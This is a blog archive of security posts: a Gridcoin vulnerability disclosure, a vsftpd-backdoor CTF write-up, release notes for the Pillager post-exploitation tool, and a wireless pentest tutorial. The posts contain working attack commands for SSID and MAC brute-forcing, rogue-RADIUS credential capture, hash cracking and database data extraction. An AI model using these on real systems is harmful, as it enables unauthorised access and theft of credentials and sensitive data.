Tuesday, June 30, 2020

18 Hacking Websites & forums - Underground hacker sites

  • Offensive Security Training: Developers of Kali Linux and Exploit DB, and the creators of the Metasploit Unleashed and Penetration Testing with Kali Linux course.
  • Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.
  • Black Hat: The Black Hat Briefings have become the biggest and the most important security conference series in the world by sticking to our core value: serving the information security community by delivering timely, actionable security information in a friendly, vendor-neutral environment.
  • SecurityFocus: Provides security information to all members of the security community, from end users, security hobbyists and network administrators to security consultants, IT Managers, CIOs and CSOs.
  • NFOHump: Offers up-to-date .NFO files and reviews on the latest pirate software releases.
  • Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.
  • Makezine: Magazine that celebrates your right to tweak, hack, and bend any technology to your own will.
  • SecTools.Org: List of 75 security tools based on a 2003 vote by hackers.
  • Packet Storm: Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.
  • Hack Forums: Emphasis on white hat, with categories for hacking, coding and computer security.
  • HackRead: HackRead is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance, and Hacking News with full-scale reviews on Social Media Platforms.
  • Metasploit: Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the worlds best penetration testing software now.
  • Phrack Magazine: Digital hacking magazine.
  • The Hacker News: The Hacker News — most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity.
  • DEFCON: Information about the largest annual hacker convention in the US, including past speeches, video, archives, and updates on the next upcoming show as well as links and other details.
  • Hackaday: A hardware hack every day.
  • KitPloit: Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security.
  • Hakin9: E-magazine offering in-depth looks at both attack and defense techniques and concentrates on difficult technical issues.

Thursday, June 11, 2020

Gridcoin - The Bad

In this post we will show why Gridcoin is insecure and probably will never achieve better security. Therefore, we are going to explain two critical implementation vulnerabilities and our experience with the core developer in the process of the responsible disclosure. 
    In our last blog post we described the Gridcoin architecture and the design vulnerability we found and fixed (the good). Now we come to the process of responsibly disclosing our findings and try to fix the two implementation vulnerabilities (the bad).

    Update (15.08.2017):
    After the talk at WOOT'17 serveral other developers of Gridcoin quickly reached out to us and told us that there was a change in responsibility internally in the Gridcoin-Dev team. Thus, we are going to wait for their response and then change this blog post accordingly. So stay tuned :)

    Update (16.08.2017):
    We are currently in touch with the whole dev team of Gridcoin and it seems that they are going to fix the vulnerabilities with the next release.


    TL;DR
    The whole Gridcoin currency is seriously insecure against attacks and should not be trusted anymore; unless some developers are in place, which have a profound background in protocol and application security.

    What is Gridcoin?

    Gridcoin is an altcoin, which is in active development since 2013. It claims to provide a high sustainability, as it has very low energy requirements in comparison to Bitcoin. It rewards users for contributing computation power to scientific projects, published on the BOINC project platform. Although Gridcoin is not as widespread as Bitcoin, its draft is very appealing as it attempts to  eliminate Bitcoin's core problems. It possesses a market capitalization of $13,530,738 as of August the 4th 2017 and its users contributed approximately 5% of the total scientific BOINC work done before October 2016.

    A detailed description of the Gridcoin architecture and technical terms used in this blog post are explained in our last blog post.

    The Issues

    Currently there are 2 implementation vulnerabilities in the source code, and we can mount the following attacks against Gridcoin:
    1. We can steal the block creation reward from many Gridcoin minters
    2. We can efficiently prevent many Gridcoin minters from claiming their block creation reward (DoS attack)
    So why do we not just open up an issue online explaining the problems?

    Because we already fixed a critical design issue in Gridcoin last year and tried to help them to fix the new issues. Unfortunately, they do not seem to have an interest in securing Gridcoin and thus leave us no other choice than fully disclosing the findings.

    In order to explain the vulnerabilities we will take a look at the current Gridcoin source code (version 3.5.9.8).

    WARNING: Due to the high number of source code lines in the source files, it can take a while until your browser shows the right line.

    Stealing the BOINC block reward

    The developer implemented our countermeasures in order to prevent our attack from the last blog post. Unfortunately, they did not look at their implementation from an attacker's perspective. Otherwise, they would have found out that they conduct not check, if the signature over the last block hash really is done over the last block hash. But we come to that in a minute. First lets take a look at the code flow:

    In the figure the called-by-graph can be seen for the function VerifyCPIDSignature.
    1. CheckBlock → DeserializeBoincBlock [Source]
      • Here we deserialize the BOINC data structure from the first transaction
    2. CheckBlock → IsCPIDValidv2 [Source]
      • Then we call a function to verify the CPID used in the block. Due to the massive changes over the last years, there are 3 possible verify functions. We are interested in the last one (VerifyCPIDSignature), for the reason that it is the current verification function.
    3. IsCPIDValidv2 → VerifyCPIDSignature [Source]
    4. VerifyCPIDSignature → CheckMessageSignature [Source, Source]
    In the last function the real signature verification is conducted [Source]. When we closely take a look at the function parameter, we see the message (std::string sMsg)  and the signature (std::string sSig) variables, which are checked. But where does this values come from?


    If we go backwards in the function call graph we see that in VerifyCPIDSignature the sMsg is the string sConcatMessage, which is a concatenation of the sCPID and the sBlockHash.
    We are interested where the sBlockHash value comes from, due to the fact that this one is the only changing value in the signature generation.
    When we go backwards, we see that the value originate from the deserialization of the BOINC structure (MiningCPID& mc) and is the variable mc.lastblockhash [Source, Source]. But wait a second, is this value ever checked whether it contains the real last block hash?

    No, it is not....

    So they just look if the stored values there end up in a valid signature.

    Thus, we just need to wait for one valid block from a researcher and copy the signature, the last block hash value, the CPID and adjust every other dynamic value, like the RAC. Consequently, we are able to claim the reward of other BOINC users. This simple bug allows us again to steal the reward of every Gridcoin researcher, like there was never a countermeasure.

    Lock out Gridcoin researcher
    The following vulnerability allows an attacker under specific circumstances to register a key pair for a CPID, even if the CPID was previously tied to another key pair. Thus, the attacker locks out a legit researcher and prevent him from claiming BOINC reward in his minted blocks.

    Reminder: A beacon is valid for 5 months, afterwards a new beacon must be sent with the same public key and CPID.

    Therefore, we need to take a look at the functions, which process the beacon information. Every time there is a block, which contains beacon information, it is processed the following way (click image for higher resolution):


    In the figure the called-by-graph can be seen for the function GetBeaconPublicKey.
    We now show the source code path:
    • ProcessBlock → CheckBlock [Source]
    • CheckBlock → LoadAdminMessages [Source]
    • LoadAdminMessages → MemorizeMessages [Source]
    • MemorizeMessages → GetBeaconPublicKey [Source]
    In the last function GetBeaconPublicKey there are different paths to process a beacon depending on the public key, the CPID, and the time since both were associated to each other.
    For the following explanation we assume that we have an existing association (bound) between a CPID A and a public key pubK_A for 4 months.
    1. First public key for a CPID received [Source]
      • The initial situation, when pubK_A was sent and bind to CPID  A (4 months ago)
    2. Existing public key for a CPID was sent [Source]
      • The case that pubK_A was resent for a CPID A, before the 5 months are passed by
    3. Other public key for a CPID was sent [Source]
      • The case, if a different public key pubK_B for the CPID A was sent via beacon.
    4. The existing public key for the CPID is expired
      • After 5 months a refresh for the association between A and pubK_A is required.
    When an incoming beacon is processed, a look up is made, if there already exists a public key for the CPID used in the beacon. If yes, it is compared to the public key used in the beacon (case 2 and 3).
    If no public key exists (case 1) the new public key is bound to the CPID.

    If a public key exists, but it was not refreshed directly 12.960.000 seconds (5 months [Source]) after the last beacon advertisement of the public key and CPID, it is handled as no public key would exist [Source].

    Thus, case 1 and 4 are treated identical, if the public key is expired, allowing an attacker to register his public key for an arbitrary CPID with expired public key. In practice this allows an attacker to lock out a Gridcoin user from the minting process of new blocks and further allows the attacker to claim reward for BOINC work he never did.

    There is a countermeasure, which allows a user to delete his last beacon (identified by the CPID) . Therefore, the user sends 1 GRC to a special address (SAuJGrxn724SVmpYNxb8gsi3tDgnFhTES9) from an GRC address associated to this CPID [Source]. We did not look into this mechanism in more detail, because it only can be used to remove our attack beacon, but does not prevent the attack.

    The responsible disclosure process

    As part of our work as researchers we all have had the pleasure to responsible disclose the findings to developer or companies.

    For the reasons that we wanted to give the developer some time to fix the design vulnerabilities, described in the last blog post, we did not issue a ticket at the Gridcoin Github project. Instead we contacted the developer at September the 14th 2016 via email and got a response one day later (2016/09/15). They proposed a variation of our countermeasure and dropped the signature in the advertising beacon, which would result in further security issues. We sent another email (2016/09/15) explained to them, why it is not wise to change our countermeasures and drop the signature in the advertising beacon.
    Unfortunately, we did not receive a response. We tried it again on October the 31th 2016. They again did not respond, but we saw in the source code that they made some promising changes. Due to some other projects we did not look into the code until May 2017. At this point we found the two implementation vulnerabilities. We contacted the developer twice via email (5th and 16th of May 2017) again, but never received a response. Thus, we decided to wait for the WOOT notification to pass by and then fully disclose the findings. We thus have no other choice then to say that:

    The whole Gridcoin cryptocurrency is seriously insecure against attacks and should not be trusted anymore; unless some developers are in place, which have a profound background in protocol and application security.

    Further Reading
    A more detailed description of the Gridcoin architecture, the old design issue and the fix will be presented at WOOT'17. Some days after the conference the paper will be available online.
    Read more

    Vsftpd Backdoor - Ekoparty Prectf - Amn3S1A Team

    It's a 32bits elf binary of some version of vsftpd, where it have been added a backdoor, they don't specify is an authentication backdoor, a special command or other stuff.

    I started looking for something weird on the authentication routines, but I didn't found anything significant in a brief period of time, so I decided to do a bindiff, that was the key for locating the backdoor quickly. I do a quick diff of the strings with the command "strings bin | sort -u" and "vimdiff" and noticed that the backdoored binary has the symbol "execl" which is weird because is a call for executing elfs, don't needed for a ftp service, and weird that the compiled binary doesn't has that symbol.





    Looking the xrefs of "execl" on IDA I found that code that is a clear backdoor, it create a socket, bind a port and duplicate the stdin, stdout and stderr to the socket and use the execl:



    There are one xrefs to this function, the function that decides when trigger that is that kind of systems equations decision:


    The backdoor was not on the authentication, it was a special command to trigger the backdoor, which is obfuscated on that systems equation, it was no needed to use a z3 equation solver because is a simple one and I did it by hand.



    The equation:
    cmd[0] = 69
    cmd[1] = 78
    cmd[1] + cmd[2] = 154
    cmd[2] + cmd[3] = 202
    cmd[3] + cmd[4] = 241
    cmd[4] + cmd[5] = 233
    cmd[5] + cmd[6] = 217
    cmd[6] + cmd[7] = 218
    cmd[7] + cmd[8] = 228
    cmd[8] + cmd[9] = 212
    cmd[9] + cmd[10] = 195
    cmd[10] + cmd[11] = 195
    cmd[11] + cmd[12] = 201
    cmd[12] + cmd[13] = 207
    cmd[13] + cmd[14] = 203
    cmd[14] + cmd[15] = 215
    cmd[15] + cmd[16] = 235
    cmd[16] + cmd[17] = 242

    The solution:
    cmd[0] = 69
    cmd[1] = 75
    cmd[2] = 79
    cmd[3] = 123
    cmd[4] = 118
    cmd[5] = 115
    cmd[6] = 102
    cmd[7] = 116
    cmd[8] = 112
    cmd[9] = 100
    cmd[10] = 95
    cmd[11] = 100
    cmd[12] = 101
    cmd[13] = 106
    cmd[14] = 97                    
    cmd[15] = 118
    cmd[16] = 117
    cmd[17] = 125


    The flag:
    EKO{vsftpd_dejavu}

    The binary:
    https://ctf.ekoparty.org/static/pre-ekoparty/backdoor


    More info
    1. How To Pentest A Network
    2. Hacker Ethic
    3. Hacking Websites
    4. Pentest With Metasploit
    5. Pentest Online Course
    6. Hacking Apps
    7. Hacking Games Online
    8. Pentest As A Service
    9. Pentest News
    10. Pentest Keys
    11. Pentest Owasp Top 10
    12. Pentest Ftp
    13. Pentestbox
    14. Hacker Anonymous
    15. Pentest Tutorial
    16. Pentest Tutorial
    17. Pentest App
    18. Pentest Cyber Security

    The Pillager 0.7 Release

    I spent the last couple days recoding the Pillager, getting rid of bugs, optimizing code, making it more extendable and more solid overall. So this post is to release the new code.  However, with that being said, the Pillager is in mass revision right now and I added some more developers to the team to add a whole host of new database attacking features as well as moving past databases and into other areas of post exploitation pillaging. Soon to be released..  As usual this tool and any tool i create is based on my issues when performing penetration tests and solves those problems.. If you have any insight or comments i will certainly take them into consideration for future releases.

    For now check out Version 0.7.. Named searches and Data searches via external config files are now functioning properly as well as other bugs fixed along the way... Drop this in a BT5 VM and make sure you have your DB python stuff installed per the help docs and you should be good to go.  If you are looking to use oracle you are going to have to install all the oracle nonsense from oracle or use a BT4r2 vm which has most of the needed drivers minus cxoracle which will need to be installed.

    http://consolecowboys.org/pillager/pillage_0.7.zip



    Ficti0n$ python pillager.py
     
    [---] The Database Pillager (DBPillage) [---]
    [---] CcLabs Release [---]
    [---] Authors: Ficti0n, [---]
    [---] Contributors: Steponequit [---]
    [---] Version: 0.7 [---]
    [---] Find Me On Twitter: ficti0n [---]
    [---] Homepage: http://console-cowboys.blogspot.com [---]

    Release Notes:
     --Fixed bugs and optimized code
     --Added Docstrings
     --Fixed Named and Data searches from config files                 

    About:
    The Database Pillager is a multiplatform database tool for searching and browsing common
    database platforms encountered while penetration testing. DBPillage can be used to search
    for PCI/HIPAA data automatically or use DBPillage to browse databases,display data.
    and search for specified tables/data instances.
    DBpillage was designed as a post exploitation pillaging tool with a goal of targeted
    extraction of data without the use of database platform specific GUI based tools that
    are difficult to use and make my job harder.

    Supported Platforms:
            --------------------
    -Oracle
    -MSSQL
    -MYSQL
            -PostGreSQL
         

            Usage Examples:
            ************************************************************************
            
            For Mysql Postgres and MsSQL pillaging:
            ---------------------------------------
            python dbPillage -a [address] -d [dbType] -u [username] -p [password]
            
            
            For Oracle pillaging you need a SID connection string:
            ------------------------------------------------------
            python dbPillage-a [address]/[sid] -d [dbType] -u [username] -p [password]
            

            Grab some hashes and Hipaa specific:(Default is PCI)
            ------------------------------------
            python dbPillage -a [address] -d [dbType] -u [username] -p [password] --hashes -s hipaa


    Drop into a SQL CMDShell:
    -------------------------
            python dbpillage.py -a [address] -d [dbType] -u [username] -p [password] -q

    Config file specified searches:
    -------------------------------
    Search for data Items from inputFiles/data.txt:
            python dbpillage.py -a [address] -d [dbType] -u [username] -p [password] -D

    Search for specific table names from inputFiles/tables.txt:
    python dbpillage.py -a [address] -d [dbType] -u [username] -p [password] -N

         
         
            Switch Options:
            ---------------------
            -# --hashes = grab database password hashes
            -l --limit  = limit the amount of rows that are searched or when displaying data (options = any number)
            -s --searchType = Type of data search you want to perform (options:pci, hipaa, all)(PCI default)
            -u --user = Database servers username
            -p --pass = Password for the database server
            -a --address = Ipaddress of the database server
            -d --database = The database type you are pillageing (options: mssql,mysql,oracle,postgres)
            -r --report = report format (HTML, XML, screen(default))
            -N --nameSearch = Search via inputFiles/tables.txt
            -D --dataSearch = Targeted data searches per inputFiles/data.txt
    -q --queryShell = Drop into a SQL CMDshell in mysql or mssql
         
         
            Prerequisites:
            -------------
            python v2  (Tested on Python 2.5.2 BT4 R2 and BT5 R3 - Oracle stuff on BT4r2 only unless you install the drivers from oracle)
            cx_oracle (cx-oracle.sourceforge.net)
            psycopg2  (initd.org/psycopg/download/)
            MySQLdb   (should be on BT by default)
            pymssql   (should be on BT by default)
         

    More info


    1. Pentest Plus
    2. Hacking Ethics
    3. Hacker Software
    4. Hacking For Dummies
    5. Hacker Lab
    6. Pentest Framework
    7. Basic Pentest 1 Walkthrough
    8. Pentest Owasp Top 10
    9. Pentest Owasp Top 10
    10. Hacking Gif
    11. Pentest Ios
    12. Hacking Growth
    13. Hacking Script
    14. Pentest Tools
    15. Hacking To The Gate
    16. Pentest Tools
    17. Hacker Typer

    Wednesday, June 10, 2020

    Wireless Scenarios Part 1: EAP-Radius JTR Hashcat, SSID MAC Issues And More

    Intro: 
    I have been on a number of wireless engagements again lately and much like the wireless blog i wrote over a year ago i am trying various combinations of techniques and tools in conjunction to gain access to networks. I will show a range of tools and techniques mostly as a reminder to myself. The format will be scenario based on what i have been seeing while testing.  Some of these tools include JTR/Hashcat with specialized rulesets, mdk3 for SSID/MAC bruteforcing, evil access points for bypassing guest networks, DNS redirection/tunneling as well as radius-wpe attacks etc... This will be a 2 part blog, first blog being more Pre-Auth attacks and the second blog being more client attacks.



    Finding Hidden SSID's and Limited user network attacks:
    Recently i have been on a lot of tests where administrators think its a wonderful idea to hide their SSID's. Administrators feel that if they hide their SSID's they are magically secure. While Cloaked SSID's may pose a slight problem it's not a security feature. Especially when hiding WEP encrypted networks. One issue that keeps coming up is hidden networks with NO clients thus no probe request/response traffic available to passively capture an SSID. Without clients you can't de-authenticate and force reconnections requests with SSID's. To top that off administrators are also running another trivial security feature known as MAC filtering. While MAC filtering is also easy to bypass, again there are no clients on the network so we must come up with strategies to figure out both the SSID's and the possible client MAC addresses. Lets start by addressing the SSID issue.
    SSID's can generally be seen in the Beacon traffic. However, if MAC cloaking or hidden SSID's are enabled on your access point they are stripped from the beacon traffic. Striping the beacons of SSID's is usually not a problem if there are clients looking to join the network. As the SSID's must be sent in probe traffic to successfully inquire about joining the network, and SSID's are than easily obtained. Thus why tools like kismet can passively discover the correct SSID given a bit of time and a few clients probing for the hidden network. But, what happens if there is no client traffic?
    So the actual scenario i was presented with recently was a Cloaked SSID on a limited use network running WEP, which had a MAC filtered client device. This device would attach to the network once a day for a limited amount of time. So the first piece of the puzzle would be figuring out the SSID for later use then tackling the rest of the problem.

    We start with a nice little tool called MDK3 which can be used to send out mass SSID requests in either dictionary style or bruteforce in order to determine an SSID. Lets start with the simple syntax then get into some more fine tuned strategies for determining SSID's based on the mind of the sysadmin.

    There are 2 modes i have been using, one is dictionary mode and the other bruteforce mode, i would always start with dictionary because its faster. If a dictionary gives no resultes then move to bruteforce techniques. Also have your Airodump-ng/Kismet running during the attack and if the SSID is found it should apear in there as well as your MDK3 results window. You can get your target BSSID value from airodump along with useful information sometimes regarding length of a hidden SSID value which can be used in fine tuning bruteforcing. MDK3 will automatically pick the correct length and then begin bruteforcing based on that length value:

    Below is an example of SSID Length Output: 
    CH 6 ][ Elapsed: 8 s ][ 2012-03-01 21:08
    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:24:A5:6F:2E:D5 -59 5 0 0 5 54 WEP WEP length: 12
    00:1A:A1:05:E8:20 -61 2 0 0 3 48 . WEP WEP length: 1
    00:24:A5:6F:37:9F -64 2 0 0 5 54 WEP WEP length: 12

    You will notice example output above says that one SSID is of length 12 and another is of length 1, these are the SSID perceived length values based on values in the packet capture. Not always accurate because these values are just Null place holder values and not always set accurately. Essentially one SSID packet above has a one null value while the other packet has 12 null values as placeholders. If a length of 1 is present you may have to start at 1 and go through the whole range of brute forcing. If the length is known then you can start and end at 12 in this case shortening the full bruteforce time considerably.

    Attack Modes and Info:
    Dictionary Mode:
    ./mdk3 [Interface] p -c 1 -t [BSSID] -f [dictionary] -s 100

    Bruteforce mode:
    ./mdk3 [Interface] p -c 1 -t [BSSID] -b u -s 100

    Above Switch mappings are defined as the following:
    b = bruteforce also can add a character set b [charset]
    s = packet speed
    c = channel
    f = ssid dictionary file

    I first tried a regular dictionary attack of common words:
    ficti0n:# mdk3 mon0 p -c 1 -t 00:01:55:B1:A3:A5 -f english.txt
    channel set to: 1
    SSID Wordlist Mode activated!
    Waiting for beacon frame from target...
    Sniffer thread started
    Found SSID length 1, usually a placeholder, no information about real SSIDs length available.
    Trying SSID:
    Packets sent: 1 - Speed: 1 packets/sec
    Got response from 03:F0:9F:17:08:32, SSID: "Secure_Access"
    Last try was: (null)
    Trying SSID: beauty
    Packets sent: 167 - Speed: 166 packets/sec
    Got response from 03:F0:9F:17:08:33, SSID: "Guest_Access"
    Last try was: (null)
    Trying SSID: bianca
    Trying SSID: winnie
    Trying SSID: isabella
    Trying SSID: sierra
    Trying SSID: 00000000
    Trying SSID: dancer1
    Packets sent: 32507 - Speed: 376 packets/sec
    Got response from 00:3B:10:47:33:32, SSID: "wow"

    I began with a dictionary against a network address i got from my initial airodump-ng. On my first MDK3 run i found one new access point named "wow" but i didnt find the target AP's SSID. If you look at the above MDK3 output there are 2 other networks with similar formats which may reflect our target networks format. Below you will see a similar format.
    • Guest_Access
    • Secure_Access
    Creating a Custom dictionary based on observations:
    If the target company has a repeating SSID format we can create our own dictionary file. According to the above output the format is [Word]_Access, we can take advantage of this by creating a new list with python using the company format. Break open your python editor and create a quick script to parse the english dictionary in the proper format for our attack by uppercasing every dictionary word and appending the word "Access".

    #--------------------------------------------------------------
    #!/usr/bin/python

    dictionary = open("rockyou-75.txt", "r")
    SSID_List = open("SSID_List.txt", "a")


    for word in dictionary:
    word = str.capitalize(word) + "Access"
    SSID_List.write(word)


    SSID_List.close()
    dictionary.close()

    #----------------------------------------------------------------

    I then ran MDK3 again with my modified list. When this was done I then was able to get a response from MDK3 and determine the SSID of the target network, shown below.

    Got response from 00:01:55:B1:A3:A5, SSID: "Secret_Access"


    Luckily i didn't have to resort to a true bruteforce attack although the format is shown above for completeness. 



    MDK3 MAC address Bruteforce:
    The next issue is that of determining a valid MAC address on a network without any known clients, this can also be done with MDK3 and bruteforce mode.  I would suggest looking at other client MAC addresses on the guest or corporate networks as a starting point. Then use those vendor startpoints as your bruteforce values. So if for example you know a bit about the company based on other network MAC values you can use this knowledge in your brute forcing with the -f switch. Below is a basic command ouput for bruteforcing MAC address filters.


    ficti0n:# mdk3 mon0 f -t

    Trying MAC 00:00:22:00:00:00 with 100.0000 ms timeout at 0 MACs per second and 0 retries
    Trying MAC 00:00:22:00:00:00 with 100.0000 ms timeout at 0 MACs per second and 1 retries
    Packets sent: 2 - Speed: 1 packets/sec

    Found a valid MAC adress: 00:00:22:00:00:00
    Have a nice day! :)

    Mdk3 -fullhelp output:
    --------------------------------------------------------------

    MAC filter bruteforce mode
    This test uses a list of known client MAC Adresses and tries to
    authenticate them to the given AP while dynamically changing
    its response timeout for best performance. It currently works only
    on APs who deny an open authentication request properly
    -t
    Target BSSID
    -m
    Set the MAC adress range to use (3 bytes, i.e. 00:12:34)
    Without -m, the internal database will be used
    -f
    Set the MAC adress to begin bruteforcing with
    (Note: You can't use -f and -m at the same time)
    ---------------------------------------------------------------------

    I wasn't aware of the above technique at the time of testing but i did give it a try on a local Access Point and found a useable mac address under contrived scenarios. So this was worth noting as I found almost zero mention of it when searching around. Also note that some access points do not properly handle the authentication scenarios in which case the above technique will not work correctly. Usually the user sends an auth request and then the AP sends an auth response denoting success or failure along with an error code, but MAC filering is not part of the normal standard so results will vary regarding error codes. This is AP functionality independent. When it does work it gives you a little smily face and says it found a useable MAC address [SHOWN ABOVE] . Unfortunately in my penetration test I was stuck waiting for a client to come online to get a useable MAC address. Below are a few ideas for the rest of the scenario.


    Depending on the location and use of the limited connectivity device there are a few options available for retrieving the WEP key. Networks with hidden SSID's have clients who are always probing for hidden networks whether onsite or remote. You could attack a client directly via a Cafe Latte attack. A Caffe Latte attack woud attack a client with a fake access point and gratuitas ARP requests to discover the WEP key of "Secret_Access" by flooding the client with ARP requests it responds to, generating enough traffic to derive the WEP key. This technique is useful now that you know the SSID, especially if the device is being used at the local coffee shop. I will take a look at this attack in the next blog when focusing on client based attacks.

    Caffe Latte was not a good option for me because the device appears online for a short period of time and might not be available either offsite at a coffee shop or even locally long enough to generate enough traffic to crack the network. In this test I however didn't have enough time to see client actually get online but had I see the client get online I would have noted his MAC address and then configured a chop chop or fragmentation attack against the network whether the client was available or not all i would really need is one data packet. I will not illustrate this whole technique as it is fully covered in the following link Cracking WEP with no Clients.


    Cracking Radius /PEAP/TTLS Hashes: (Post EAP Attack)
    This is about attacking hashes from WPE Radius attacks, but just as a reference before we start here is a quick radius attack setup guide without going into to much detail.


    Steps to Setup WPE attack
    1. Install the following freeradius server and WPE patch. http://blog.opensecurityresearch.com/2011/09/freeradius-wpe-updated.html
    2. Start your WPE server by typing 'radiusd'
    3. Tail your log file so you can see incoming credentials 'tail -f /usr/local/var/log/radius/freeradius-server-wpe.log
    4. Setup an access point with similar settings as to what you are seeing in airodump or wireshark essentially this will be a WPA Enterprise with AES and a default secret of 'test' which is set in the WPE installed package by default so it can talk between the AP and the radius server. You will also need to run an ifconfig on your radius server box so you know what address to point the AP too.
    5. Optionally you can use hostAP instead of a physical enterprise AP setup.

    Use one of your local computers to connect to the FreeRadius wireless network and type in a fake username/password to grab an example hash. If you dont see your hash output in the logfile then double check all your ip addresses and insure your server is running. In a real attack you would wait for clients to attach to your Access point and the credentials will be forwarded to your FreeRadius-WPE server. Once this is done the fun begins and also where we will start in our attack scenario.

    Formatting hashes:
    Your hashes can come in a few formats, they might come back as PAP responses in which case they will be plain text passwords. Plaintext PAP can sometimes be a result of mobile devices sending paswords. Otherwise your attack will result in MSChap password challenge/response hashes. Once you receive your MSChap hashes they have to be formated in a specific way in order to crack them. Here is an example hash and the proper format to use before trying to crack the hashes.

    Example Hash:
    mschap: Mon Feb 05 19:35:59 2012
    username: test
    challenge: b3:f8:48:e9:db:02:22:83
    response: 15:36:d7:e9:da:43:1f:5f:d2:4b:51:53:87:89:63:b7:12:26:7c:a8:f7:ea:9c:26

    Formated for john:(username::::response:challenge)
    test::::1536d7e9da431f5fd24b5153878963b712267ca8f7ea9c26:b3f848e9db022283

    Tool to automate this: (Tool Link)
    One of my friends wrote a python script that will take your freeradius-server-wpe.log as input and format out all of the hashes one per line.. The script output can be fed directly into John The Ripper(JTR).

    JTR Cracking and Custom Rulesets:
    One way to crack these hashes is to use JTR with a bunch of dictionary attacks and if that fails procede from there with custom korelogic rulesets. Check out preceding link for more info on password cracking techniques which can be employed in addition to this blog. Below I will reiterate a few points on setting up JTR with custom rulesets from the Defcon challenge in 2010 based on the previous link and then how to parse them out and use them.

    The first thing to note is that the format of the hashes you get from WPE will generally be considered NETNTLM within JTR so we will have to specify that as well as the wordlists we would like to use to start.

    Dictionary attacking first:
    First go into your JTR directory and try to crack with some dictionaries of your choosing:
    ficti0n:# cd Desktop/Tools\ /john/run
    ficti0n:# ./john --wordlist=wordlists/wpa.txt --format=NETNTLM JohnFormat.txt

    Loaded 1 password hash (NTLMv1 C/R MD4 DES [netntlm])
    test             (test)
    guesses: 1  time: 0:00:00:00 100.00% (ETA: Tue Mar 20 19:29:31 2012)  c/s: 692441  trying: test

    Custom Rules: korelogic rulesets (Link)
    If the cracking fails on all of your wordlists then try installing custom rulesets with the following sequence of commands meant do download and then append the rules to the current john file. The following command can also be found at the above Korelogic link.
    ficti0n:# wget http://contest-2010.korelogic.com/rules.txt
    ficti0n:# cat rules.txt >> john.conf


    Once this is done you can directly specify any rule in the file similar to the following:
    ficti0n:# ./john --wordlist=wordlists/english.txt --format=NETNTLM --rules:KoreLogicRulesAppendNum_AddSpecialEverywhere johnFormat.txt


    Or if you are time independent just let them all rip and go on vacation and check the results when you get back LOL
    ficti0n:# for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --wordlist=wordlists/english.txt --format=NETNTLM --rules:${ruleset} JohnFormat.txt; done


    Hashcat rulesets and building pasword files:
    Another way to build complex password files is to use tools like HashCat with supplied password rules and pipe it out to STDOut, either into a file or the STDIn of other cracking programs like John the Ripper. There is a rules folder in HashCat which has a number of rules provided by default.


    Available Hashcat Rules:
    ficti0n:# ls
    best64.rule      generated.rule   passwordspro.rule  T0XlC.rule     toggles3.rule
    combinator.rule  leetspeak.rule   perfect.rule       toggles1.rule  toggles4.rule
    d3ad0ne.rule     oscommerce.rule  specific.rule      toggles2.rule  toggles5.rule

    Creating Passwords with Hashcat and a dictionary:
    ficti0n:# ./hashcat-cli32.bin -r rules/passwordspro.rule ../wordlists/cain.txt --stdout

    You can also pipe passwords directly into JTR from hashcat output but its really slow so I suggest you make a world list then load it up with --wordlist, but the example is shown below.

    Piping Hashcat password rules into JTR: (really slow)
    ficti0n:# ./hashcat-cli32.bin -r rules/passwordspro.rule ../wordlists/rockyou-75.txt --stdout |/pentest/passwords/john/john --format=NETNTLM JohnFormat.txt --stdin


    I hope someone finds my above notes useful, I am going to write up some client side attack stuff as well and post it up here... Let me know if you have any questions or need more clarification on anything covered in the blogs. 

    Related word
    1. Hacking Device
    2. Pentestlab
    3. Basic Pentest 1 Walkthrough
    4. Pentest Basics
    5. Hacking Browser
    6. Pentest Cyber Security
    7. Hacker Videos
    8. Hacking Forums
    9. Pentest App
    10. Pentest Practice Sites
    11. Pentester Academy
    12. Pentestgeek
    13. Hacking Box
    14. Pentestmonkey
    15. Pentest Blog

    Magecart Targets Emergency Services-related Sites Via Insecure S3 Buckets

    Hacking groups are continuing to leverage misconfigured AWS S3 data storage buckets to insert malicious code into websites in an attempt to swipe credit card information and carry out malvertising campaigns. In a new report shared with The Hacker News, cybersecurity firm RiskIQ said it identified three compromised websites belonging to Endeavor Business Media last month that are still hosting

    via The Hacker News
    More information

    Tuesday, June 9, 2020

    AutoNSE - Massive NSE (Nmap Scripting Engine) AutoSploit And AutoScanner


    Massive NSE (Nmap Scripting Engine) AutoSploit and AutoScanner. The Nmap Scripting Engine (NSE) is one of Nmap's most powerful and flexible features. It allows users to write (and share) simple scripts (using the Lua programming language ) to automate a wide variety of networking tasks. Those scripts are executed in parallel with the speed and efficiency you expect from Nmap. Users can rely on the growing and diverse set of scripts distributed with Nmap, or write their own to meet custom needs. For more informations https://nmap.org/book/man-nse.html

    Installation
    $ git clone https://github.com/m4ll0k/AutoNSE.git
    $ cd AutoNSE
    $ bash autonse.sh

    Exmaples
    $ bash autonse.sh




    Related posts

    Top 10 Great Gifts For The Hacker In Your Life

    Give gifts this holiday season that inspires your favorite hackers to make something great. Our ten top picks for gifts to make 'em smile are perfect for hackers of all styles, ages, and interests.
    Holiday gift guides always struggle when faced with nailing down a list for hackers — that's because hackers are as diverse in their interests and fascinations as they are diverse in gender, color, size and everything else. Someone with a multi-focused set of curiosity and unique gifts for finding out what makes the crackable crack may seem like a daunting individual to stuff a stocking for … but don't fret. With a keen eye on the latest interests in hacker culture, we've got a gift guide that can make the hacker in your life smile as they enjoy using your gift to hack and explore throughout the coming year.
    The Onion Pi-Iemhacker
    Anonymity online: The Onion Pi
    One of the most popular "snake oil" (fake) privacy gadgets is the so-called "Tor in a box" — a plug-and-play gadget that promises to make you anonymous online. Nearly all of these are made by clueless charlatans whose products put you at risk for privacy and security breaches. But your favorite hacker can just make or build an "Onion Pi" for $69.95, and with this free tutorial.

    Attribution Dice
    With Attribution Dice ($20), anyone can be a high-priced security consultant, and predict breach headlines before PR firms have a chance to feed them to reporters! With every security breach, hackers roll their eyes when headlines and PR firms roll out the same old, same old terms, methods and culprits. Instead of rolling eyes, your hacker can roll the dice, and wow friends, family, and neighbors with their hacker cyber-powers.
    21 Bitcoin Computer
